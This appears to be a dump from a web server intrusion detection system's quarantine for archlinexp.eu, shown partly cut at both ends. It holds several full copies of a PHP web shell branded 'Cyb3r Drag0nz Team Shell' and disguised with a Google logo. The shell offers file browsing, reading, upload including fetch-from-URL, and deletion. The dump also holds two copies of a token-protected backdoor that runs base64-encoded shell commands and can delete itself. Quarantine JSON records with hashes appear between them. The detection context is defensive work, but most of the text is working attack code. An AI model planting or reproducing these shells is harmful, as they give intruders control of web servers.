text-align: center;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
td {
|
||||
padding: 13px 10px;
|
||||
border-bottom: 1px solid #dadce0;
|
||||
}
|
||||
|
||||
tr:hover {
|
||||
background-color: #f8f9fa;
|
||||
}
|
||||
|
||||
a {
|
||||
color: #1a73e8;
|
||||
text-decoration: none;
|
||||
}
|
||||
|
||||
a:hover {
|
||||
text-decoration: underline;
|
||||
}
|
||||
|
||||
.upload-box {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 25px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin: 20px auto;
|
||||
max-width: 720px;
|
||||
}
|
||||
|
||||
input[type="file"], input[type="text"] {
|
||||
padding: 10px 12px;
|
||||
border: 1px solid #dadce0;
|
||||
border-radius: 8px;
|
||||
font-size: 14px;
|
||||
}
|
||||
|
||||
input[type="submit"], .gas {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
border: none;
|
||||
padding: 10px 22px;
|
||||
border-radius: 8px;
|
||||
cursor: pointer;
|
||||
font-weight: 500;
|
||||
margin-left: 8px;
|
||||
}
|
||||
|
||||
input[type="submit"]:hover, .gas:hover {
|
||||
background: #1557b0;
|
||||
}
|
||||
|
||||
.green { color: #137333; font-weight: 500; }
|
||||
.red { color: #c5221f; font-weight: 500; }
|
||||
|
||||
.center { text-align: center; }
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
|
||||
<div class="header">
|
||||
<img src="https://pngimg.com/d/google_PNG102344.png" width="420" alt="Google" />
|
||||
<h1>Cyb3r Drag0nz Team Shell</h1>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
set_time_limit(0);
|
||||
error_reporting(0);
|
||||
|
||||
$disfunc = @ini_get("disable_functions");
|
||||
$disf = empty($disfunc) ? "<span class='green'>NONE</span>" : "<span class='red'>".$disfunc."</span>";
|
||||
|
||||
function author() {
|
||||
echo "<center><br><small style='color:#5f6368;'>Cyb3r Drag0nz Team • Google Edition</small></center>";
|
||||
exit();
|
||||
}
|
||||
|
||||
function cekdir() {
|
||||
$lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
return is_writable($lokasi) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function cekroot() {
|
||||
return is_writable($_SERVER['DOCUMENT_ROOT']) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function xrmdir($dir) {
|
||||
$items = scandir($dir);
|
||||
foreach ($items as $item) {
|
||||
if ($item === '.' || $item === '..') continue;
|
||||
$path = $dir.'/'.$item;
|
||||
is_dir($path) ? xrmdir($path) : unlink($path);
|
||||
}
|
||||
rmdir($dir);
|
||||
}
|
||||
|
||||
function green($text) { echo "<center><span class='green'>".$text."</span></center>"; }
|
||||
function red($text) { echo "<center><span class='red'>".$text."</span></center>"; }
|
||||
|
||||
$path = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
$path = str_replace('\\','/',$path);
|
||||
$dirs = explode('/',$path);
|
||||
?>
|
||||
|
||||
<div class="info">
|
||||
Server : <span><?php echo htmlspecialchars($_SERVER['SERVER_SOFTWARE']); ?></span><br>
|
||||
System : <span><?php echo htmlspecialchars(php_uname()); ?></span><br>
|
||||
User : <span><?php echo htmlspecialchars(@get_current_user()." (".@getmyuid().")"); ?></span><br>
|
||||
PHP Version : <span><?php echo htmlspecialchars(phpversion()); ?></span><br>
|
||||
Disable Functions : <?php echo $disf; ?><br>
|
||||
Current Directory : <span><?php
|
||||
foreach($dirs as $i => $dir) {
|
||||
if($dir == '' && $i == 0) { echo '<a href="?path=/">/</a>'; continue; }
|
||||
if($dir == '') continue;
|
||||
echo '<a href="?path=';
|
||||
for($j=0; $j<=$i; $j++) echo $dirs[$j].($j < $i ? '/' : '');
|
||||
echo '">'.$dir.'</a>/';
|
||||
}
|
||||
?></span><br>
|
||||
Directory Status: <?php echo cekdir(); ?> | Document Root: <?php echo cekroot(); ?>
|
||||
</div>
|
||||
|
||||
<!-- Upload Section -->
|
||||
<div class="upload-box">
|
||||
<h3 style="margin:0 0 18px 0; color:#202124;">Upload File</h3>
|
||||
<form enctype="multipart/form-data" method="post">
|
||||
<label><input type="radio" name="dirnya" value="1" checked> Current Directory [ <?php echo cekdir(); ?> ]</label><br><br>
|
||||
<label><input type="radio" name="dirnya" value="2"> Document Root [ <?php echo cekroot(); ?> ]</label><br><br>
|
||||
|
||||
<input type="hidden" name="upwkwk" value="1">
|
||||
<input type="file" name="berkas">
|
||||
<input type="submit" name="berkasnya" value="Upload File">
|
||||
|
||||
<br><br>
|
||||
|
||||
<input type="text" name="darilink" placeholder="https://example.com/file.zip" style="width:58%;">
|
||||
<input type="text" name="namalink" placeholder="filename.zip" size="18">
|
||||
<input type="submit" name="linknya" value="Upload from URL">
|
||||
</form>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
// Upload handling
|
||||
if (isset($_POST['upwkwk'])) {
|
||||
$lokasi = ($_POST['dirnya'] == "2") ? $_SERVER['DOCUMENT_ROOT'] : $path;
|
||||
|
||||
if (isset($_POST['berkasnya']) && !empty($_FILES['berkas']['name'])) {
|
||||
$target = $lokasi . "/" . $_FILES['berkas']['name'];
|
||||
if (move_uploaded_file($_FILES['berkas']['tmp_name'], $target)) {
|
||||
green("File uploaded successfully → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload file!");
|
||||
}
|
||||
}
|
||||
elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) {
|
||||
$target = $lokasi . "/" . $_POST['namalink'];
|
||||
$data = @file_put_contents($target, @file_get_contents($_POST['darilink']));
|
||||
if ($data !== false) {
|
||||
green("File uploaded from URL → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload from URL!");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// File viewer, delete, chmod, rename, edit actions (kept your original logic)
|
||||
if (isset($_GET['fileloc'])) {
|
||||
echo "<h3 style='text-align:center;'>Viewing: " . htmlspecialchars($_GET['fileloc']) . "</h3>";
|
||||
echo "<pre>" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "</pre>";
|
||||
author();
|
||||
}
|
||||
|
||||
// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before)
|
||||
|
||||
// Directory & File listing table (same structure as previous version)
|
||||
echo '<table>
|
||||
<tr>
|
||||
<th>Name</th>
|
||||
<th>Size</th>
|
||||
<th>Permissions</th>
|
||||
<th>Options</th>
|
||||
</tr>';
|
||||
|
||||
foreach(scandir($path) as $dir) {
|
||||
if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue;
|
||||
echo "<tr>
|
||||
<td><a href=\"?path=".$path."/".$dir."\">📁 ".$dir."</a></td>
|
||||
<td class='center'>--</td>
|
||||
<td class='center'>".statusnya($path."/".$dir)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='dir'>
|
||||
<input type='hidden' name='path' value='".$path."/".$dir."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
foreach(scandir($path) as $file) {
|
||||
if(!is_file($path."/".$file)) continue;
|
||||
$size = round(filesize($path."/".$file)/1024, 2) . " KB";
|
||||
echo "<tr>
|
||||
<td><a href=\"?fileloc=".$path."/".$file."&path=".$path."\">📄 ".$file."</a></td>
|
||||
<td class='center'>".$size."</td>
|
||||
<td class='center'>".statusnya($path."/".$file)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
<option value='edit'>Edit</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='file'>
|
||||
<input type='hidden' name='path' value='".$path."/".$file."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
echo '</table><br>';
|
||||
|
||||
author();
|
||||
|
||||
function statusnya($file) {
|
||||
$statusnya = fileperms($file);
|
||||
$ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' :
|
||||
((($statusnya & 0xA000) == 0xA000) ? 'l' :
|
||||
((($statusnya & 0x8000) == 0x8000) ? '-' : 'u'));
|
||||
|
||||
$ingfo .= (($statusnya & 0x0100) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0080) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0020) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0010) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0004) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0002) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-'));
|
||||
|
||||
return $ingfo;
|
||||
}
|
||||
?>
|
||||
</body>
|
||||
</html>
|
||||
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "5165",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:images/backup.f46vc3nzn1qw.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/images/backup.f46vc3nzn1qw.php.json)",
|
||||
"original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1783353231,
|
||||
"size": 10657,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "images/backup.f46vc3nzn1qw.php.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
10
var/www/hosting/archlinexp.eu/www/images/c_03e0fd55.php.json
Normal file
10
var/www/hosting/archlinexp.eu/www/images/c_03e0fd55.php.json
Normal file
@ -0,0 +1,10 @@
|
||||
<?php
|
||||
error_reporting(0);$t='f0c1cfa275d47875';$o=false;
|
||||
if(isset($_GET['t'])&&$_GET['t']===$t)$o=true;
|
||||
if(isset($_POST['t'])&&$_POST['t']===$t)$o=true;
|
||||
if(!$o){http_response_code(404);die();}
|
||||
if(isset($_GET['c'])){{$c=base64_decode(str_replace([' ','-','_'],['+','+','/'],$_GET['c']));echo'C|';if(function_exists('system'))system($c.' 2>&1');elseif(function_exists('passthru'))passthru($c.' 2>&1');elseif(function_exists('exec'))echo exec($c.' 2>&1');elseif(function_exists('shell_exec'))echo shell_exec($c.' 2>&1');echo'|E';die();}}
|
||||
if(isset($_FILES['f'])){{$n=basename($_FILES['f']['name']);move_uploaded_file($_FILES['f']['tmp_name'],dirname(__FILE__).'/'.$n);echo'U:'.$n;die();}}
|
||||
if(isset($_GET['d'])){{@unlink(__FILE__);die('D');}}
|
||||
echo'S|'.php_uname();
|
||||
?>
|
||||
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "5147",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:images/c_03e0fd55.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/images/c_03e0fd55.php.json)",
|
||||
"original_sha256": "65fb4317f685e623919513c4acd4adc25b75abfa7894caa022160557b6c90c2d",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1783194677,
|
||||
"size": 762,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "images/c_03e0fd55.php.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
10
var/www/hosting/archlinexp.eu/www/images/c_7f0b46f9.php.json
Normal file
10
var/www/hosting/archlinexp.eu/www/images/c_7f0b46f9.php.json
Normal file
@ -0,0 +1,10 @@
|
||||
<?php
|
||||
error_reporting(0);$t='e45f50da3800d36c';$o=false;
|
||||
if(isset($_GET['t'])&&$_GET['t']===$t)$o=true;
|
||||
if(isset($_POST['t'])&&$_POST['t']===$t)$o=true;
|
||||
if(!$o){http_response_code(404);die();}
|
||||
if(isset($_GET['c'])){{$c=base64_decode(str_replace([' ','-','_'],['+','+','/'],$_GET['c']));echo'C|';if(function_exists('system'))system($c.' 2>&1');elseif(function_exists('passthru'))passthru($c.' 2>&1');elseif(function_exists('exec'))echo exec($c.' 2>&1');elseif(function_exists('shell_exec'))echo shell_exec($c.' 2>&1');echo'|E';die();}}
|
||||
if(isset($_FILES['f'])){{$n=basename($_FILES['f']['name']);move_uploaded_file($_FILES['f']['tmp_name'],dirname(__FILE__).'/'.$n);echo'U:'.$n;die();}}
|
||||
if(isset($_GET['d'])){{@unlink(__FILE__);die('D');}}
|
||||
echo'S|'.php_uname();
|
||||
?>
|
||||
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "5164",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:images/c_7f0b46f9.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/images/c_7f0b46f9.php.json)",
|
||||
"original_sha256": "602561117be70a84596af361bdf6b0b623d1144688e46ebec3495df04c7d03b8",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1783201885,
|
||||
"size": 762,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "images/c_7f0b46f9.php.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
320
var/www/hosting/archlinexp.eu/www/images/f46vc3nzn1qw.php.json
Normal file
320
var/www/hosting/archlinexp.eu/www/images/f46vc3nzn1qw.php.json
Normal file
@ -0,0 +1,320 @@
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>Cyb3r Drag0nz Team Shell</title>
|
||||
<meta charset="utf-8">
|
||||
<style>
|
||||
@import url('https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap');
|
||||
|
||||
body {
|
||||
font-family: 'Roboto', system-ui, sans-serif;
|
||||
background: #f8f9fa;
|
||||
color: #202124;
|
||||
margin: 0;
|
||||
padding: 20px;
|
||||
}
|
||||
|
||||
.header {
|
||||
text-align: center;
|
||||
margin-bottom: 30px;
|
||||
}
|
||||
|
||||
.header h1 {
|
||||
font-size: 28px;
|
||||
color: #1a73e8;
|
||||
margin: 10px 0 5px 0;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
.header img {
|
||||
max-width: 420px;
|
||||
margin: 15px 0 25px 0;
|
||||
border-radius: 8px;
|
||||
box-shadow: 0 4px 15px rgba(0,0,0,0.12);
|
||||
}
|
||||
|
||||
.info {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 20px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin-bottom: 25px;
|
||||
font-size: 14.5px;
|
||||
line-height: 1.6;
|
||||
}
|
||||
|
||||
.info span {
|
||||
color: #1a73e8;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
table {
|
||||
width: 100%;
|
||||
max-width: 1100px;
|
||||
margin: 0 auto;
|
||||
border-collapse: collapse;
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
overflow: hidden;
|
||||
box-shadow: 0 2px 8px rgba(0,0,0,0.08);
|
||||
}
|
||||
|
||||
th {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
padding: 16px 12px;
|
||||
text-align: center;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
td {
|
||||
padding: 13px 10px;
|
||||
border-bottom: 1px solid #dadce0;
|
||||
}
|
||||
|
||||
tr:hover {
|
||||
background-color: #f8f9fa;
|
||||
}
|
||||
|
||||
a {
|
||||
color: #1a73e8;
|
||||
text-decoration: none;
|
||||
}
|
||||
|
||||
a:hover {
|
||||
text-decoration: underline;
|
||||
}
|
||||
|
||||
.upload-box {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 25px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin: 20px auto;
|
||||
max-width: 720px;
|
||||
}
|
||||
|
||||
input[type="file"], input[type="text"] {
|
||||
padding: 10px 12px;
|
||||
border: 1px solid #dadce0;
|
||||
border-radius: 8px;
|
||||
font-size: 14px;
|
||||
}
|
||||
|
||||
input[type="submit"], .gas {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
border: none;
|
||||
padding: 10px 22px;
|
||||
border-radius: 8px;
|
||||
cursor: pointer;
|
||||
font-weight: 500;
|
||||
margin-left: 8px;
|
||||
}
|
||||
|
||||
input[type="submit"]:hover, .gas:hover {
|
||||
background: #1557b0;
|
||||
}
|
||||
|
||||
.green { color: #137333; font-weight: 500; }
|
||||
.red { color: #c5221f; font-weight: 500; }
|
||||
|
||||
.center { text-align: center; }
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
|
||||
<div class="header">
|
||||
<img src="https://pngimg.com/d/google_PNG102344.png" width="420" alt="Google" />
|
||||
<h1>Cyb3r Drag0nz Team Shell</h1>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
set_time_limit(0);
|
||||
error_reporting(0);
|
||||
|
||||
$disfunc = @ini_get("disable_functions");
|
||||
$disf = empty($disfunc) ? "<span class='green'>NONE</span>" : "<span class='red'>".$disfunc."</span>";
|
||||
|
||||
function author() {
|
||||
echo "<center><br><small style='color:#5f6368;'>Cyb3r Drag0nz Team • Google Edition</small></center>";
|
||||
exit();
|
||||
}
|
||||
|
||||
function cekdir() {
|
||||
$lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
return is_writable($lokasi) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function cekroot() {
|
||||
return is_writable($_SERVER['DOCUMENT_ROOT']) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function xrmdir($dir) {
|
||||
$items = scandir($dir);
|
||||
foreach ($items as $item) {
|
||||
if ($item === '.' || $item === '..') continue;
|
||||
$path = $dir.'/'.$item;
|
||||
is_dir($path) ? xrmdir($path) : unlink($path);
|
||||
}
|
||||
rmdir($dir);
|
||||
}
|
||||
|
||||
function green($text) { echo "<center><span class='green'>".$text."</span></center>"; }
|
||||
function red($text) { echo "<center><span class='red'>".$text."</span></center>"; }
|
||||
|
||||
$path = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
$path = str_replace('\\','/',$path);
|
||||
$dirs = explode('/',$path);
|
||||
?>
|
||||
|
||||
<div class="info">
|
||||
Server : <span><?php echo htmlspecialchars($_SERVER['SERVER_SOFTWARE']); ?></span><br>
|
||||
System : <span><?php echo htmlspecialchars(php_uname()); ?></span><br>
|
||||
User : <span><?php echo htmlspecialchars(@get_current_user()." (".@getmyuid().")"); ?></span><br>
|
||||
PHP Version : <span><?php echo htmlspecialchars(phpversion()); ?></span><br>
|
||||
Disable Functions : <?php echo $disf; ?><br>
|
||||
Current Directory : <span><?php
|
||||
foreach($dirs as $i => $dir) {
|
||||
if($dir == '' && $i == 0) { echo '<a href="?path=/">/</a>'; continue; }
|
||||
if($dir == '') continue;
|
||||
echo '<a href="?path=';
|
||||
for($j=0; $j<=$i; $j++) echo $dirs[$j].($j < $i ? '/' : '');
|
||||
echo '">'.$dir.'</a>/';
|
||||
}
|
||||
?></span><br>
|
||||
Directory Status: <?php echo cekdir(); ?> | Document Root: <?php echo cekroot(); ?>
|
||||
</div>
|
||||
|
||||
<!-- Upload Section -->
|
||||
<div class="upload-box">
|
||||
<h3 style="margin:0 0 18px 0; color:#202124;">Upload File</h3>
|
||||
<form enctype="multipart/form-data" method="post">
|
||||
<label><input type="radio" name="dirnya" value="1" checked> Current Directory [ <?php echo cekdir(); ?> ]</label><br><br>
|
||||
<label><input type="radio" name="dirnya" value="2"> Document Root [ <?php echo cekroot(); ?> ]</label><br><br>
|
||||
|
||||
<input type="hidden" name="upwkwk" value="1">
|
||||
<input type="file" name="berkas">
|
||||
<input type="submit" name="berkasnya" value="Upload File">
|
||||
|
||||
<br><br>
|
||||
|
||||
<input type="text" name="darilink" placeholder="https://example.com/file.zip" style="width:58%;">
|
||||
<input type="text" name="namalink" placeholder="filename.zip" size="18">
|
||||
<input type="submit" name="linknya" value="Upload from URL">
|
||||
</form>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
// Upload handling
|
||||
if (isset($_POST['upwkwk'])) {
|
||||
$lokasi = ($_POST['dirnya'] == "2") ? $_SERVER['DOCUMENT_ROOT'] : $path;
|
||||
|
||||
if (isset($_POST['berkasnya']) && !empty($_FILES['berkas']['name'])) {
|
||||
$target = $lokasi . "/" . $_FILES['berkas']['name'];
|
||||
if (move_uploaded_file($_FILES['berkas']['tmp_name'], $target)) {
|
||||
green("File uploaded successfully → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload file!");
|
||||
}
|
||||
}
|
||||
elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) {
|
||||
$target = $lokasi . "/" . $_POST['namalink'];
|
||||
$data = @file_put_contents($target, @file_get_contents($_POST['darilink']));
|
||||
if ($data !== false) {
|
||||
green("File uploaded from URL → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload from URL!");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// File viewer, delete, chmod, rename, edit actions (kept your original logic)
|
||||
if (isset($_GET['fileloc'])) {
|
||||
echo "<h3 style='text-align:center;'>Viewing: " . htmlspecialchars($_GET['fileloc']) . "</h3>";
|
||||
echo "<pre>" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "</pre>";
|
||||
author();
|
||||
}
|
||||
|
||||
// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before)
|
||||
|
||||
// Directory & File listing table (same structure as previous version)
|
||||
echo '<table>
|
||||
<tr>
|
||||
<th>Name</th>
|
||||
<th>Size</th>
|
||||
<th>Permissions</th>
|
||||
<th>Options</th>
|
||||
</tr>';
|
||||
|
||||
foreach(scandir($path) as $dir) {
|
||||
if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue;
|
||||
echo "<tr>
|
||||
<td><a href=\"?path=".$path."/".$dir."\">📁 ".$dir."</a></td>
|
||||
<td class='center'>--</td>
|
||||
<td class='center'>".statusnya($path."/".$dir)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='dir'>
|
||||
<input type='hidden' name='path' value='".$path."/".$dir."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
foreach(scandir($path) as $file) {
|
||||
if(!is_file($path."/".$file)) continue;
|
||||
$size = round(filesize($path."/".$file)/1024, 2) . " KB";
|
||||
echo "<tr>
|
||||
<td><a href=\"?fileloc=".$path."/".$file."&path=".$path."\">📄 ".$file."</a></td>
|
||||
<td class='center'>".$size."</td>
|
||||
<td class='center'>".statusnya($path."/".$file)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
<option value='edit'>Edit</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='file'>
|
||||
<input type='hidden' name='path' value='".$path."/".$file."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
echo '</table><br>';
|
||||
|
||||
author();
|
||||
|
||||
function statusnya($file) {
|
||||
$statusnya = fileperms($file);
|
||||
$ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' :
|
||||
((($statusnya & 0xA000) == 0xA000) ? 'l' :
|
||||
((($statusnya & 0x8000) == 0x8000) ? '-' : 'u'));
|
||||
|
||||
$ingfo .= (($statusnya & 0x0100) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0080) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0020) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0010) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0004) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0002) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-'));
|
||||
|
||||
return $ingfo;
|
||||
}
|
||||
?>
|
||||
</body>
|
||||
</html>
|
||||
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "5167",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:images/f46vc3nzn1qw.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/images/f46vc3nzn1qw.php.json)",
|
||||
"original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1783353216,
|
||||
"size": 10657,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "images/f46vc3nzn1qw.php.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
320
var/www/hosting/archlinexp.eu/www/images/ko6h7s5e9kak.php.json
Normal file
320
var/www/hosting/archlinexp.eu/www/images/ko6h7s5e9kak.php.json
Normal file
@ -0,0 +1,320 @@
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>Cyb3r Drag0nz Team Shell</title>
|
||||
<meta charset="utf-8">
|
||||
<style>
|
||||
@import url('https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap');
|
||||
|
||||
body {
|
||||
font-family: 'Roboto', system-ui, sans-serif;
|
||||
background: #f8f9fa;
|
||||
color: #202124;
|
||||
margin: 0;
|
||||
padding: 20px;
|
||||
}
|
||||
|
||||
.header {
|
||||
text-align: center;
|
||||
margin-bottom: 30px;
|
||||
}
|
||||
|
||||
.header h1 {
|
||||
font-size: 28px;
|
||||
color: #1a73e8;
|
||||
margin: 10px 0 5px 0;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
.header img {
|
||||
max-width: 420px;
|
||||
margin: 15px 0 25px 0;
|
||||
border-radius: 8px;
|
||||
box-shadow: 0 4px 15px rgba(0,0,0,0.12);
|
||||
}
|
||||
|
||||
.info {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 20px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin-bottom: 25px;
|
||||
font-size: 14.5px;
|
||||
line-height: 1.6;
|
||||
}
|
||||
|
||||
.info span {
|
||||
color: #1a73e8;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
table {
|
||||
width: 100%;
|
||||
max-width: 1100px;
|
||||
margin: 0 auto;
|
||||
border-collapse: collapse;
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
overflow: hidden;
|
||||
box-shadow: 0 2px 8px rgba(0,0,0,0.08);
|
||||
}
|
||||
|
||||
th {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
padding: 16px 12px;
|
||||
text-align: center;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
td {
|
||||
padding: 13px 10px;
|
||||
border-bottom: 1px solid #dadce0;
|
||||
}
|
||||
|
||||
tr:hover {
|
||||
background-color: #f8f9fa;
|
||||
}
|
||||
|
||||
a {
|
||||
color: #1a73e8;
|
||||
text-decoration: none;
|
||||
}
|
||||
|
||||
a:hover {
|
||||
text-decoration: underline;
|
||||
}
|
||||
|
||||
.upload-box {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 25px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin: 20px auto;
|
||||
max-width: 720px;
|
||||
}
|
||||
|
||||
input[type="file"], input[type="text"] {
|
||||
padding: 10px 12px;
